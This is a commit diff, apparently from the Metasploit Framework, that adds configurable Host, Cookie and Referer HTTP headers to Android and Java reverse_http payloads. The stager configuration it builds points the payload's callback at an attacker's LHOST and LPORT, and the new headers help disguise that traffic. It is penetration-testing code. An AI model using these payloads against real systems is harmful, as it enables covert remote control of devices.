add http headers to Android/Java

Author: timwr

lib/msf/core/payload/android/reverse_http.rb

@@ -18,6 +18,18 @@ module Payload::Android::ReverseHttp
   include Msf::Payload::Android
   include Msf::Payload::UUID::Options
 
+  #
+  # Register reverse_http specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options([
+        OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+        OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+        OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
+      ], self.class)
+  end
+
   #
   # Generate the transport-specific configuration
   #

lib/msf/core/payload/java/reverse_http.rb

@@ -24,8 +24,11 @@ module Payload::Java::ReverseHttp
   def initialize(*args)
     super
     register_advanced_options([
-      Msf::OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]),
-      Msf::OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)'])
+      OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]),
+      OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
+      OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+      OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+      OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']),
     ])
   end
 
@@ -64,6 +67,10 @@ def stager_config(opts={})
 
     c =  ''
     c << "Spawn=#{ds["Spawn"] || 2}\n"
+    c << "HeaderUser-Agent=#{ds["MeterpreterUserAgent"]}\n" if ds["MeterpreterUserAgent"]
+    c << "HeaderHost=#{ds["HttpHeaderHost"]}\n" if ds["HttpHeaderHost"]
+    c << "HeaderReferer=#{ds["HttpHeaderReferer"]}\n" if ds["HttpHeaderReferer"]
+    c << "HeaderCookie=#{ds["HttpHeaderCookie"]}\n" if ds["HttpHeaderCookie"]
     c << "URL=#{scheme}://#{ds['LHOST']}"
     c << ":#{ds['LPORT']}" if ds['LPORT']
     c << luri

lib/msf/core/payload_generator.rb

@@ -298,7 +298,7 @@ def format_payload(shellcode)
     # @return [String] Java payload as a JAR or WAR file
     def generate_java_payload
       payload_module = framework.payloads.create(payload)
-      payload_module.datastore.merge!(datastore)
+      payload_module.datastore.import_options_from_hash(datastore)
       case format
       when "raw", "jar"
         if payload_module.respond_to? :generate_jar